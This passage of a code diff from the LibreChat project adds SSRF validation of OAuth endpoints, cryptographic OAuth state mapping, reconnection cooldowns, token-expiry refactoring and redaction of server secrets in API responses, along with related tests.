/** Map of userId:serverName -> timestamp when reconnection started */ /** Map of userId:serverName -> timestamp when reconnection started */
@ -9,7 +15,17 @@ export class OAuthReconnectionTracker {
private readonly RECONNECTION_TIMEOUT_MS = 3 * 60 * 1000; // 3 minutes private readonly RECONNECTION_TIMEOUT_MS = 3 * 60 * 1000; // 3 minutes
public isFailed(userId: string, serverName: string): boolean { public isFailed(userId: string, serverName: string): boolean {
return this.failed.get(userId)?.has(serverName) ?? false; const meta = this.failedMeta.get(userId)?.get(serverName);
if (!meta) {
return false;
}
const idx = Math.min(meta.attempts - 1, COOLDOWN_SCHEDULE_MS.length - 1);
const cooldown = COOLDOWN_SCHEDULE_MS[idx];
const elapsed = Date.now() - meta.lastFailedAt;
if (elapsed >= cooldown) {
return false;
}
return true;
} }
/** Check if server is in the active set (original simple check) */ /** Check if server is in the active set (original simple check) */
@ -48,11 +64,15 @@ export class OAuthReconnectionTracker {
} }
public setFailed(userId: string, serverName: string): void { public setFailed(userId: string, serverName: string): void {
if (!this.failed.has(userId)) { if (!this.failedMeta.has(userId)) {
this.failed.set(userId, new Set()); this.failedMeta.set(userId, new Map());
} }
const userMap = this.failedMeta.get(userId)!;
this.failed.get(userId)?.add(serverName); const existing = userMap.get(serverName);
userMap.set(serverName, {
attempts: (existing?.attempts ?? 0) + 1,
lastFailedAt: Date.now(),
});
} }
public setActive(userId: string, serverName: string): void { public setActive(userId: string, serverName: string): void {
@ -68,10 +88,10 @@ export class OAuthReconnectionTracker {
} }
public removeFailed(userId: string, serverName: string): void { public removeFailed(userId: string, serverName: string): void {
const userServers = this.failed.get(userId); const userMap = this.failedMeta.get(userId);
userServers?.delete(serverName); userMap?.delete(serverName);
if (userServers?.size === 0) { if (userMap?.size === 0) {
this.failed.delete(userId); this.failedMeta.delete(userId);
} }
} }
@ -94,7 +114,7 @@ export class OAuthReconnectionTracker {
activeTimestamps: number; activeTimestamps: number;
} { } {
return { return {
usersWithFailedServers: this.failed.size, usersWithFailedServers: this.failedMeta.size,
usersWithActiveReconnections: this.active.size, usersWithActiveReconnections: this.active.size,
activeTimestamps: this.activeTimestamps.size, activeTimestamps: this.activeTimestamps.size,
}; };

View file

@ -24,6 +24,7 @@ import {
selectRegistrationAuthMethod, selectRegistrationAuthMethod,
inferClientAuthMethod, inferClientAuthMethod,
} from './methods'; } from './methods';
import { isSSRFTarget, resolveHostnameSSRF } from '~/auth';
import { sanitizeUrlForLogging } from '~/mcp/utils'; import { sanitizeUrlForLogging } from '~/mcp/utils';
/** Type for the OAuth metadata from the SDK */ /** Type for the OAuth metadata from the SDK */
@ -144,7 +145,9 @@ export class MCPOAuthHandler {
resourceMetadata = await discoverOAuthProtectedResourceMetadata(serverUrl, {}, fetchFn); resourceMetadata = await discoverOAuthProtectedResourceMetadata(serverUrl, {}, fetchFn);
if (resourceMetadata?.authorization_servers?.length) { if (resourceMetadata?.authorization_servers?.length) {
authServerUrl = new URL(resourceMetadata.authorization_servers[0]); const discoveredAuthServer = resourceMetadata.authorization_servers[0];
await this.validateOAuthUrl(discoveredAuthServer, 'authorization_server');
authServerUrl = new URL(discoveredAuthServer);
logger.debug( logger.debug(
`[MCPOAuth] Found authorization server from resource metadata: ${authServerUrl}`, `[MCPOAuth] Found authorization server from resource metadata: ${authServerUrl}`,
); );
@ -161,20 +164,7 @@ export class MCPOAuthHandler {
logger.debug( logger.debug(
`[MCPOAuth] Discovering OAuth metadata from ${sanitizeUrlForLogging(authServerUrl)}`, `[MCPOAuth] Discovering OAuth metadata from ${sanitizeUrlForLogging(authServerUrl)}`,
); );
let rawMetadata = await discoverAuthorizationServerMetadata(authServerUrl, { const rawMetadata = await this.discoverWithOriginFallback(authServerUrl, fetchFn);
fetchFn,
});
// If discovery failed and we're using a path-based URL, try the base URL
if (!rawMetadata && authServerUrl.pathname !== '/') {
const baseUrl = new URL(authServerUrl.origin);
logger.debug(
`[MCPOAuth] Discovery failed with path, trying base URL: ${sanitizeUrlForLogging(baseUrl)}`,
);
rawMetadata = await discoverAuthorizationServerMetadata(baseUrl, {
fetchFn,
});
}
if (!rawMetadata) { if (!rawMetadata) {
/** /**
@ -213,6 +203,19 @@ export class MCPOAuthHandler {
logger.debug(`[MCPOAuth] OAuth metadata discovered successfully`); logger.debug(`[MCPOAuth] OAuth metadata discovered successfully`);
const metadata = await OAuthMetadataSchema.parseAsync(rawMetadata); const metadata = await OAuthMetadataSchema.parseAsync(rawMetadata);
const endpointChecks: Promise<void>[] = [];
if (metadata.registration_endpoint) {
endpointChecks.push(
this.validateOAuthUrl(metadata.registration_endpoint, 'registration_endpoint'),
);
}
if (metadata.token_endpoint) {
endpointChecks.push(this.validateOAuthUrl(metadata.token_endpoint, 'token_endpoint'));
}
if (endpointChecks.length > 0) {
await Promise.all(endpointChecks);
}
logger.debug(`[MCPOAuth] OAuth metadata parsed successfully`); logger.debug(`[MCPOAuth] OAuth metadata parsed successfully`);
return { return {
metadata: metadata as unknown as OAuthMetadata, metadata: metadata as unknown as OAuthMetadata,
@ -221,6 +224,39 @@ export class MCPOAuthHandler {
}; };
} }
/**
* Discovers OAuth authorization server metadata, retrying with just the origin
* when discovery fails for a path-based URL. Shared implementation used by
* `discoverMetadata` and both `refreshOAuthTokens` branches.
*/
private static async discoverWithOriginFallback(
serverUrl: URL,
fetchFn: FetchLike,
): ReturnType<typeof discoverAuthorizationServerMetadata> {
let metadata: Awaited<ReturnType<typeof discoverAuthorizationServerMetadata>>;
try {
metadata = await discoverAuthorizationServerMetadata(serverUrl, { fetchFn });
} catch (err) {
if (serverUrl.pathname === '/') {
throw err;
}
const baseUrl = new URL(serverUrl.origin);
logger.debug(
`[MCPOAuth] Discovery threw for path URL, trying base URL: ${sanitizeUrlForLogging(baseUrl)}`,
{ error: err },
);
return discoverAuthorizationServerMetadata(baseUrl, { fetchFn });
}
if (!metadata && serverUrl.pathname !== '/') {
const baseUrl = new URL(serverUrl.origin);
logger.debug(
`[MCPOAuth] Discovery failed with path, trying base URL: ${sanitizeUrlForLogging(baseUrl)}`,
);
return discoverAuthorizationServerMetadata(baseUrl, { fetchFn });
}
return metadata;
}
/** /**
* Registers an OAuth client dynamically * Registers an OAuth client dynamically
*/ */
@ -335,10 +371,14 @@ export class MCPOAuthHandler {
logger.debug(`[MCPOAuth] Generated flowId: ${flowId}, state: ${state}`); logger.debug(`[MCPOAuth] Generated flowId: ${flowId}, state: ${state}`);
try { try {
// Check if we have pre-configured OAuth settings
if (config?.authorization_url && config?.token_url && config?.client_id) { if (config?.authorization_url && config?.token_url && config?.client_id) {
logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for ${serverName}`); logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for ${serverName}`);
await Promise.all([
this.validateOAuthUrl(config.authorization_url, 'authorization_url'),
this.validateOAuthUrl(config.token_url, 'token_url'),
]);
const skipCodeChallengeCheck = const skipCodeChallengeCheck =
config?.skip_code_challenge_check === true || config?.skip_code_challenge_check === true ||
process.env.MCP_SKIP_CODE_CHALLENGE_CHECK === 'true'; process.env.MCP_SKIP_CODE_CHALLENGE_CHECK === 'true';
@ -390,10 +430,11 @@ export class MCPOAuthHandler {
code_challenge_methods_supported: codeChallengeMethodsSupported, code_challenge_methods_supported: codeChallengeMethodsSupported,
}; };
logger.debug(`[MCPOAuth] metadata for "${serverName}": ${JSON.stringify(metadata)}`); logger.debug(`[MCPOAuth] metadata for "${serverName}": ${JSON.stringify(metadata)}`);
const redirectUri = this.getDefaultRedirectUri(serverName);
const clientInfo: OAuthClientInformation = { const clientInfo: OAuthClientInformation = {
client_id: config.client_id, client_id: config.client_id,
client_secret: config.client_secret, client_secret: config.client_secret,
redirect_uris: [config.redirect_uri || this.getDefaultRedirectUri(serverName)], redirect_uris: [redirectUri],
scope: config.scope, scope: config.scope,
token_endpoint_auth_method: tokenEndpointAuthMethod, token_endpoint_auth_method: tokenEndpointAuthMethod,
}; };
@ -402,12 +443,12 @@ export class MCPOAuthHandler {
const { authorizationUrl, codeVerifier } = await startAuthorization(serverUrl, { const { authorizationUrl, codeVerifier } = await startAuthorization(serverUrl, {
metadata: metadata as unknown as SDKOAuthMetadata, metadata: metadata as unknown as SDKOAuthMetadata,
clientInformation: clientInfo, clientInformation: clientInfo,
redirectUrl: clientInfo.redirect_uris?.[0] || this.getDefaultRedirectUri(serverName), redirectUrl: redirectUri,
scope: config.scope, scope: config.scope,
}); });
/** Add state parameter with flowId to the authorization URL */ /** Add cryptographic state parameter to the authorization URL */
authorizationUrl.searchParams.set('state', flowId); authorizationUrl.searchParams.set('state', state);
logger.debug(`[MCPOAuth] Added state parameter to authorization URL`); logger.debug(`[MCPOAuth] Added state parameter to authorization URL`);
const flowMetadata: MCPOAuthFlowMetadata = { const flowMetadata: MCPOAuthFlowMetadata = {
@ -442,8 +483,7 @@ export class MCPOAuthHandler {
`[MCPOAuth] OAuth metadata discovered, auth server URL: ${sanitizeUrlForLogging(authServerUrl)}`, `[MCPOAuth] OAuth metadata discovered, auth server URL: ${sanitizeUrlForLogging(authServerUrl)}`,
); );
/** Dynamic client registration based on the discovered metadata */ const redirectUri = this.getDefaultRedirectUri(serverName);
const redirectUri = config?.redirect_uri || this.getDefaultRedirectUri(serverName);
logger.debug(`[MCPOAuth] Registering OAuth client with redirect URI: ${redirectUri}`); logger.debug(`[MCPOAuth] Registering OAuth client with redirect URI: ${redirectUri}`);
const clientInfo = await this.registerOAuthClient( const clientInfo = await this.registerOAuthClient(
@ -485,8 +525,8 @@ export class MCPOAuthHandler {
`[MCPOAuth] Authorization URL: ${sanitizeUrlForLogging(authorizationUrl.toString())}`, `[MCPOAuth] Authorization URL: ${sanitizeUrlForLogging(authorizationUrl.toString())}`,
); );
/** Add state parameter with flowId to the authorization URL */ /** Add cryptographic state parameter to the authorization URL */
authorizationUrl.searchParams.set('state', flowId); authorizationUrl.searchParams.set('state', state);
logger.debug(`[MCPOAuth] Added state parameter to authorization URL`); logger.debug(`[MCPOAuth] Added state parameter to authorization URL`);
if (resourceMetadata?.resource != null && resourceMetadata.resource) { if (resourceMetadata?.resource != null && resourceMetadata.resource) {
@ -652,6 +692,62 @@ export class MCPOAuthHandler {
return randomBytes(32).toString('base64url'); return randomBytes(32).toString('base64url');
} }
/** Validates an OAuth URL is not targeting a private/internal address */
private static async validateOAuthUrl(url: string, fieldName: string): Promise<void> {
let hostname: string;
try {
hostname = new URL(url).hostname;
} catch {
throw new Error(`Invalid OAuth ${fieldName}: ${sanitizeUrlForLogging(url)}`);
}
if (isSSRFTarget(hostname)) {
throw new Error(`OAuth ${fieldName} targets a blocked address`);
}
if (await resolveHostnameSSRF(hostname)) {
throw new Error(`OAuth ${fieldName} resolves to a private IP address`);
}
}
private static readonly STATE_MAP_TYPE = 'mcp_oauth_state';
/**
* Stores a mapping from the opaque OAuth state parameter to the flowId.
* This allows the callback to resolve the flowId from an unguessable state
* value, preventing attackers from forging callback requests.
*/
static async storeStateMapping(
state: string,
flowId: string,
flowManager: FlowStateManager<MCPOAuthTokens | null>,
): Promise<void> {
await flowManager.initFlow(state, this.STATE_MAP_TYPE, { flowId });
}
/**
* Resolves an opaque OAuth state parameter back to the original flowId.
* Returns null if the state is not found (expired or never stored).
*/
static async resolveStateToFlowId(
state: string,
flowManager: FlowStateManager<MCPOAuthTokens | null>,
): Promise<string | null> {
const mapping = await flowManager.getFlowState(state, this.STATE_MAP_TYPE);
return (mapping?.metadata?.flowId as string) ?? null;
}
/**
* Deletes an orphaned state mapping when a flow is replaced.
* Prevents old authorization URLs from resolving after a flow restart.
*/
static async deleteStateMapping(
state: string,
flowManager: FlowStateManager<MCPOAuthTokens | null>,
): Promise<void> {
await flowManager.deleteFlow(state, this.STATE_MAP_TYPE);
}
/** /**
* Gets the default redirect URI for a server * Gets the default redirect URI for a server
*/ */
@ -725,19 +821,20 @@ export class MCPOAuthHandler {
scope: metadata.clientInfo.scope, scope: metadata.clientInfo.scope,
}); });
/** Use the stored client information and metadata to determine the token URL */
let tokenUrl: string; let tokenUrl: string;
let authMethods: string[] | undefined; let authMethods: string[] | undefined;
if (config?.token_url) { if (config?.token_url) {
await this.validateOAuthUrl(config.token_url, 'token_url');
tokenUrl = config.token_url; tokenUrl = config.token_url;
authMethods = config.token_endpoint_auth_methods_supported; authMethods = config.token_endpoint_auth_methods_supported;
} else if (!metadata.serverUrl) { } else if (!metadata.serverUrl) {
throw new Error('No token URL available for refresh'); throw new Error('No token URL available for refresh');
} else { } else {
/** Auto-discover OAuth configuration for refresh */ /** Auto-discover OAuth configuration for refresh */
const oauthMetadata = await discoverAuthorizationServerMetadata(metadata.serverUrl, { const serverUrl = new URL(metadata.serverUrl);
fetchFn: this.createOAuthFetch(oauthHeaders), const fetchFn = this.createOAuthFetch(oauthHeaders);
}); const oauthMetadata = await this.discoverWithOriginFallback(serverUrl, fetchFn);
if (!oauthMetadata) { if (!oauthMetadata) {
/** /**
* No metadata discovered - use fallback /token endpoint. * No metadata discovered - use fallback /token endpoint.
@ -754,6 +851,7 @@ export class MCPOAuthHandler {
tokenUrl = oauthMetadata.token_endpoint; tokenUrl = oauthMetadata.token_endpoint;
authMethods = oauthMetadata.token_endpoint_auth_methods_supported; authMethods = oauthMetadata.token_endpoint_auth_methods_supported;
} }
await this.validateOAuthUrl(tokenUrl, 'token_url');
} }
const body = new URLSearchParams({ const body = new URLSearchParams({
@ -827,10 +925,10 @@ export class MCPOAuthHandler {
return this.processRefreshResponse(tokens, metadata.serverName, 'stored client info'); return this.processRefreshResponse(tokens, metadata.serverName, 'stored client info');
} }
// Fallback: If we have pre-configured OAuth settings, use them
if (config?.token_url && config?.client_id) { if (config?.token_url && config?.client_id) {
logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for token refresh`); logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for token refresh`);
await this.validateOAuthUrl(config.token_url, 'token_url');
const tokenUrl = new URL(config.token_url); const tokenUrl = new URL(config.token_url);
const body = new URLSearchParams({ const body = new URLSearchParams({
@ -911,9 +1009,9 @@ export class MCPOAuthHandler {
} }
/** Auto-discover OAuth configuration for refresh */ /** Auto-discover OAuth configuration for refresh */
const oauthMetadata = await discoverAuthorizationServerMetadata(metadata.serverUrl, { const serverUrl = new URL(metadata.serverUrl);
fetchFn: this.createOAuthFetch(oauthHeaders), const fetchFn = this.createOAuthFetch(oauthHeaders);
}); const oauthMetadata = await this.discoverWithOriginFallback(serverUrl, fetchFn);
let tokenUrl: URL; let tokenUrl: URL;
if (!oauthMetadata?.token_endpoint) { if (!oauthMetadata?.token_endpoint) {
@ -928,6 +1026,7 @@ export class MCPOAuthHandler {
} else { } else {
tokenUrl = new URL(oauthMetadata.token_endpoint); tokenUrl = new URL(oauthMetadata.token_endpoint);
} }
await this.validateOAuthUrl(tokenUrl.href, 'token_url');
const body = new URLSearchParams({ const body = new URLSearchParams({
grant_type: 'refresh_token', grant_type: 'refresh_token',
@ -977,7 +1076,9 @@ export class MCPOAuthHandler {
}, },
oauthHeaders: Record<string, string> = {}, oauthHeaders: Record<string, string> = {},
): Promise<void> { ): Promise<void> {
// build the revoke URL, falling back to the server URL + /revoke if no revocation endpoint is provided if (metadata.revocationEndpoint != null) {
await this.validateOAuthUrl(metadata.revocationEndpoint, 'revocation_endpoint');
}
const revokeUrl: URL = const revokeUrl: URL =
metadata.revocationEndpoint != null metadata.revocationEndpoint != null
? new URL(metadata.revocationEndpoint) ? new URL(metadata.revocationEndpoint)

View file

@ -4,6 +4,15 @@ import type { TokenMethods, IToken } from '@librechat/data-schemas';
import type { MCPOAuthTokens, ExtendedOAuthTokens, OAuthMetadata } from './types'; import type { MCPOAuthTokens, ExtendedOAuthTokens, OAuthMetadata } from './types';
import { isSystemUserId } from '~/mcp/enum'; import { isSystemUserId } from '~/mcp/enum';
export class ReauthenticationRequiredError extends Error {
constructor(serverName: string, reason: 'expired' | 'missing') {
super(
`Re-authentication required for "${serverName}": access token ${reason} and no refresh token available`,
);
this.name = 'ReauthenticationRequiredError';
}
}
interface StoreTokensParams { interface StoreTokensParams {
userId: string; userId: string;
serverName: string; serverName: string;
@ -27,7 +36,12 @@ interface GetTokensParams {
findToken: TokenMethods['findToken']; findToken: TokenMethods['findToken'];
refreshTokens?: ( refreshTokens?: (
refreshToken: string, refreshToken: string,
metadata: { userId: string; serverName: string; identifier: string }, metadata: {
userId: string;
serverName: string;
identifier: string;
clientInfo?: OAuthClientInformation;
},
) => Promise<MCPOAuthTokens>; ) => Promise<MCPOAuthTokens>;
createToken?: TokenMethods['createToken']; createToken?: TokenMethods['createToken'];
updateToken?: TokenMethods['updateToken']; updateToken?: TokenMethods['updateToken'];
@ -69,46 +83,40 @@ export class MCPTokenStorage {
`${logPrefix} Token expires_in: ${'expires_in' in tokens ? tokens.expires_in : 'N/A'}, expires_at: ${'expires_at' in tokens ? tokens.expires_at : 'N/A'}`, `${logPrefix} Token expires_in: ${'expires_in' in tokens ? tokens.expires_in : 'N/A'}, expires_at: ${'expires_at' in tokens ? tokens.expires_at : 'N/A'}`,
); );
// Handle both expires_in and expires_at formats const defaultTTL = 365 * 24 * 60 * 60;
let accessTokenExpiry: Date; let accessTokenExpiry: Date;
let expiresInSeconds: number;
if ('expires_at' in tokens && tokens.expires_at) { if ('expires_at' in tokens && tokens.expires_at) {
/** MCPOAuthTokens format - already has calculated expiry */ /** MCPOAuthTokens format - already has calculated expiry */
logger.debug(`${logPrefix} Using expires_at: ${tokens.expires_at}`); logger.debug(`${logPrefix} Using expires_at: ${tokens.expires_at}`);
accessTokenExpiry = new Date(tokens.expires_at); accessTokenExpiry = new Date(tokens.expires_at);
expiresInSeconds = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000);
} else if (tokens.expires_in) { } else if (tokens.expires_in) {
/** Standard OAuthTokens format - calculate expiry */ /** Standard OAuthTokens format - use expires_in directly to avoid lossy Date round-trip */
logger.debug(`${logPrefix} Using expires_in: ${tokens.expires_in}`); logger.debug(`${logPrefix} Using expires_in: ${tokens.expires_in}`);
expiresInSeconds = tokens.expires_in;
accessTokenExpiry = new Date(Date.now() + tokens.expires_in * 1000); accessTokenExpiry = new Date(Date.now() + tokens.expires_in * 1000);
} else { } else {
/** No expiry provided - default to 1 year */
logger.debug(`${logPrefix} No expiry provided, using default`); logger.debug(`${logPrefix} No expiry provided, using default`);
accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000); expiresInSeconds = defaultTTL;
accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000);
} }
logger.debug(`${logPrefix} Calculated expiry date: ${accessTokenExpiry.toISOString()}`); logger.debug(`${logPrefix} Calculated expiry date: ${accessTokenExpiry.toISOString()}`);
logger.debug(
`${logPrefix} Date object: ${JSON.stringify({
time: accessTokenExpiry.getTime(),
valid: !isNaN(accessTokenExpiry.getTime()),
iso: accessTokenExpiry.toISOString(),
})}`,
);
// Ensure the date is valid before passing to createToken
if (isNaN(accessTokenExpiry.getTime())) { if (isNaN(accessTokenExpiry.getTime())) {
logger.error(`${logPrefix} Invalid expiry date calculated, using default`); logger.error(`${logPrefix} Invalid expiry date calculated, using default`);
accessTokenExpiry = new Date(Date.now() + 365 * 24 * 60 * 60 * 1000); accessTokenExpiry = new Date(Date.now() + defaultTTL * 1000);
expiresInSeconds = defaultTTL;
} }
// Calculate expiresIn (seconds from now)
const expiresIn = Math.floor((accessTokenExpiry.getTime() - Date.now()) / 1000);
const accessTokenData = { const accessTokenData = {
userId, userId,
type: 'mcp_oauth', type: 'mcp_oauth',
identifier, identifier,
token: encryptedAccessToken, token: encryptedAccessToken,
expiresIn: expiresIn > 0 ? expiresIn : 365 * 24 * 60 * 60, // Default to 1 year if negative expiresIn: expiresInSeconds > 0 ? expiresInSeconds : defaultTTL,
}; };
// Check if token already exists and update if it does // Check if token already exists and update if it does
@ -273,10 +281,11 @@ export class MCPTokenStorage {
}); });
if (!refreshTokenData) { if (!refreshTokenData) {
const reason = isMissing ? 'missing' : 'expired';
logger.info( logger.info(
`${logPrefix} Access token ${isMissing ? 'missing' : 'expired'} and no refresh token available`, `${logPrefix} Access token ${reason} and no refresh token available — re-authentication required`,
); );
return null; throw new ReauthenticationRequiredError(serverName, reason);
} }
if (!refreshTokens) { if (!refreshTokens) {
@ -395,6 +404,9 @@ export class MCPTokenStorage {
logger.debug(`${logPrefix} Loaded existing OAuth tokens from storage`); logger.debug(`${logPrefix} Loaded existing OAuth tokens from storage`);
return tokens; return tokens;
} catch (error) { } catch (error) {
if (error instanceof ReauthenticationRequiredError) {
throw error;
}
logger.error(`${logPrefix} Failed to retrieve tokens`, error); logger.error(`${logPrefix} Failed to retrieve tokens`, error);
return null; return null;
} }

View file

@ -88,6 +88,7 @@ export interface MCPOAuthFlowMetadata extends FlowMetadata {
clientInfo?: OAuthClientInformation; clientInfo?: OAuthClientInformation;
metadata?: OAuthMetadata; metadata?: OAuthMetadata;
resourceMetadata?: OAuthProtectedResourceMetadata; resourceMetadata?: OAuthProtectedResourceMetadata;
authorizationUrl?: string;
} }
export interface MCPOAuthTokens extends OAuthTokens { export interface MCPOAuthTokens extends OAuthTokens {

View file

@ -17,20 +17,20 @@
import * as net from 'net'; import * as net from 'net';
import * as http from 'http'; import * as http from 'http';
import { Keyv } from 'keyv';
import { Agent } from 'undici'; import { Agent } from 'undici';
import { Types } from 'mongoose';
import { randomUUID } from 'crypto'; import { randomUUID } from 'crypto';
import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js'; import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
import { StreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/streamableHttp.js'; import { StreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/streamableHttp.js';
import { Keyv } from 'keyv';
import { Types } from 'mongoose';
import type { IUser } from '@librechat/data-schemas'; import type { IUser } from '@librechat/data-schemas';
import type { Socket } from 'net'; import type { Socket } from 'net';
import type * as t from '~/mcp/types'; import type * as t from '~/mcp/types';
import { MCPInspectionFailedError } from '~/mcp/errors';
import { registryStatusCache } from '~/mcp/registry/cache/RegistryStatusCache'; import { registryStatusCache } from '~/mcp/registry/cache/RegistryStatusCache';
import { MCPServersInitializer } from '~/mcp/registry/MCPServersInitializer'; import { MCPServersInitializer } from '~/mcp/registry/MCPServersInitializer';
import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry'; import { MCPServersRegistry } from '~/mcp/registry/MCPServersRegistry';
import { ConnectionsRepository } from '~/mcp/ConnectionsRepository'; import { ConnectionsRepository } from '~/mcp/ConnectionsRepository';
import { MCPInspectionFailedError } from '~/mcp/errors';
import { FlowStateManager } from '~/flow/manager'; import { FlowStateManager } from '~/flow/manager';
import { MCPConnection } from '~/mcp/connection'; import { MCPConnection } from '~/mcp/connection';
import { MCPManager } from '~/mcp/MCPManager'; import { MCPManager } from '~/mcp/MCPManager';

View file

@ -1456,4 +1456,102 @@ describe('ServerConfigsDB', () => {
expect(retrieved?.apiKey?.key).toBeUndefined(); expect(retrieved?.apiKey?.key).toBeUndefined();
}); });
}); });
describe('DB layer returns decrypted secrets (redaction is at controller layer)', () => {
it('should return decrypted apiKey.key to VIEW-only user via get()', async () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'Secret API Key Server',
apiKey: {
source: 'admin',
authorization_type: 'bearer',
key: 'admin-secret-api-key',
},
};
const created = await serverConfigsDB.add('temp-name', config, userId);
const role = await mongoose.models.AccessRole.findOne({
accessRoleId: AccessRoleIds.MCPSERVER_VIEWER,
});
await mongoose.models.AclEntry.create({
principalType: PrincipalType.USER,
principalModel: PrincipalModel.USER,
principalId: new mongoose.Types.ObjectId(userId2),
resourceType: ResourceType.MCPSERVER,
resourceId: new mongoose.Types.ObjectId(created.config.dbId!),
permBits: PermissionBits.VIEW,
roleId: role!._id,
grantedBy: new mongoose.Types.ObjectId(userId),
});
const result = await serverConfigsDB.get(created.serverName, userId2);
expect(result).toBeDefined();
expect(result?.apiKey?.key).toBe('admin-secret-api-key');
});
it('should return decrypted oauth.client_secret to VIEW-only user via get()', async () => {
const config = createSSEConfig('Secret OAuth Server', 'Test', {
client_id: 'my-client-id',
client_secret: 'admin-oauth-secret',
});
const created = await serverConfigsDB.add('temp-name', config, userId);
const role = await mongoose.models.AccessRole.findOne({
accessRoleId: AccessRoleIds.MCPSERVER_VIEWER,
});
await mongoose.models.AclEntry.create({
principalType: PrincipalType.USER,
principalModel: PrincipalModel.USER,
principalId: new mongoose.Types.ObjectId(userId2),
resourceType: ResourceType.MCPSERVER,
resourceId: new mongoose.Types.ObjectId(created.config.dbId!),
permBits: PermissionBits.VIEW,
roleId: role!._id,
grantedBy: new mongoose.Types.ObjectId(userId),
});
const result = await serverConfigsDB.get(created.serverName, userId2);
expect(result).toBeDefined();
expect(result?.oauth?.client_secret).toBe('admin-oauth-secret');
});
it('should return decrypted secrets to VIEW-only user via getAll()', async () => {
const config: ParsedServerConfig = {
type: 'sse',
url: 'https://example.com/mcp',
title: 'Shared Secret Server',
apiKey: {
source: 'admin',
authorization_type: 'bearer',
key: 'shared-api-key',
},
oauth: {
client_id: 'shared-client',
client_secret: 'shared-oauth-secret',
},
};
const created = await serverConfigsDB.add('temp-name', config, userId);
const role = await mongoose.models.AccessRole.findOne({
accessRoleId: AccessRoleIds.MCPSERVER_VIEWER,
});
await mongoose.models.AclEntry.create({
principalType: PrincipalType.USER,
principalModel: PrincipalModel.USER,
principalId: new mongoose.Types.ObjectId(userId2),
resourceType: ResourceType.MCPSERVER,
resourceId: new mongoose.Types.ObjectId(created.config.dbId!),
permBits: PermissionBits.VIEW,
roleId: role!._id,
grantedBy: new mongoose.Types.ObjectId(userId),
});
const result = await serverConfigsDB.getAll(userId2);
const serverConfig = result[created.serverName];
expect(serverConfig).toBeDefined();
expect(serverConfig?.apiKey?.key).toBe('shared-api-key');
expect(serverConfig?.oauth?.client_secret).toBe('shared-oauth-secret');
});
});
}); });

View file

@ -1,6 +1,66 @@
import { Constants } from 'librechat-data-provider'; import { Constants } from 'librechat-data-provider';
import type { ParsedServerConfig } from '~/mcp/types';
export const mcpToolPattern = new RegExp(`^.+${Constants.mcp_delimiter}.+$`); export const mcpToolPattern = new RegExp(`^.+${Constants.mcp_delimiter}.+$`);
/**
* Allowlist-based sanitization for API responses. Only explicitly listed fields are included;
* new fields added to ParsedServerConfig are excluded by default until allowlisted here.
*
* URLs are returned as-is: DB-stored configs reject ${VAR} patterns at validation time
* (MCPServerUserInputSchema), and YAML configs are admin-managed. Env variable resolution
* is handled at the schema/input boundary, not the output boundary.
*/
export function redactServerSecrets(config: ParsedServerConfig): Partial<ParsedServerConfig> {
const safe: Partial<ParsedServerConfig> = {
type: config.type,
url: config.url,
title: config.title,
description: config.description,
iconPath: config.iconPath,
chatMenu: config.chatMenu,
requiresOAuth: config.requiresOAuth,
capabilities: config.capabilities,
tools: config.tools,
toolFunctions: config.toolFunctions,
initDuration: config.initDuration,
updatedAt: config.updatedAt,
dbId: config.dbId,
consumeOnly: config.consumeOnly,
inspectionFailed: config.inspectionFailed,
customUserVars: config.customUserVars,
serverInstructions: config.serverInstructions,
};
if (config.apiKey) {
safe.apiKey = {
source: config.apiKey.source,
authorization_type: config.apiKey.authorization_type,
...(config.apiKey.custom_header && { custom_header: config.apiKey.custom_header }),
};
}
if (config.oauth) {
const { client_secret: _secret, ...safeOAuth } = config.oauth;
safe.oauth = safeOAuth;
}
return Object.fromEntries(
Object.entries(safe).filter(([, v]) => v !== undefined),
) as Partial<ParsedServerConfig>;
}
/** Applies allowlist-based sanitization to a map of server configs. */
export function redactAllServerSecrets(
configs: Record<string, ParsedServerConfig>,
): Record<string, Partial<ParsedServerConfig>> {
const result: Record<string, Partial<ParsedServerConfig>> = {};
for (const [key, config] of Object.entries(configs)) {
result[key] = redactServerSecrets(config);
}
return result;
}
/** /**
* Normalizes a server name to match the pattern ^[a-zA-Z0-9_.-]+$ * Normalizes a server name to match the pattern ^[a-zA-Z0-9_.-]+$
* This is required for Azure OpenAI models with Tool Calling * This is required for Azure OpenAI models with Tool Calling

View file

@ -0,0 +1,76 @@
jest.mock('@librechat/data-schemas', () => ({
logger: { info: jest.fn(), warn: jest.fn(), error: jest.fn(), debug: jest.fn() },
}));
import { DEFAULT_IMPORT_MAX_FILE_SIZE, resolveImportMaxFileSize } from '../import';
import { logger } from '@librechat/data-schemas';
describe('resolveImportMaxFileSize', () => {
let originalEnv: string | undefined;
beforeEach(() => {
originalEnv = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
jest.clearAllMocks();
});
afterEach(() => {
if (originalEnv !== undefined) {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = originalEnv;
} else {
delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
}
});
it('returns 262144000 (250 MiB) when env var is not set', () => {
delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
expect(resolveImportMaxFileSize()).toBe(262144000);
expect(DEFAULT_IMPORT_MAX_FILE_SIZE).toBe(262144000);
});
it('returns default when env var is empty string', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
});
it('respects a custom numeric value', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '5242880';
expect(resolveImportMaxFileSize()).toBe(5242880);
});
it('parses string env var to number', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '1048576';
expect(resolveImportMaxFileSize()).toBe(1048576);
});
it('falls back to default and warns for non-numeric string', () => {
